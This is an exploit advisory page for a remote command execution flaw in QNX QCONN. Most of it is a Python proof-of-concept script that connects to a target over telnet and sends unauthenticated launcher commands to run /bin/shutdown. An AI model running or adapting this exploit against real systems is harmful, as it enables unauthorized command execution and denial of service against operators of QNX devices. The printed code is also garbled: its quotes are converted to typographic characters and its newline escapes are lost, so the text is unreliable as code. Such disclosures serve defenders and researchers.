QNX QCONN Remote Command Execution Exploit
Published on February 8th, 2013
Summary
Credit:
The information has been provided by Mor!p3r.
Details
Vulnerable Systems:
* QNX 6.5.0 >= , QCONN >= 1.4.207944
import telnetlib
import sys
if len(sys.argv) < 3:
print ‘ ‘
print ‘ —————————————————–‘
print ‘ + Qconn Remote Command Execution PoC (Shutdown) +’
print ‘ —————————————————–‘
print ‘ ‘
print ‘ + Usage: QCONNRC.py <Target IP> <Port>’
print ‘ + Ex> QCONNRC.py 192.168.0.1 8000′
print ”
sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
attack =’service launchern’ + ‘start/flags 8000 /bin/shutdown /bin/shutdown -bn’ + ‘continuen’
telnet = telnetlib.Telnet(host, port)
telnet.write(attack)
print ‘[+] Finish’
telnet.close()
Disclosure Timeline:
Published: 2012-09-12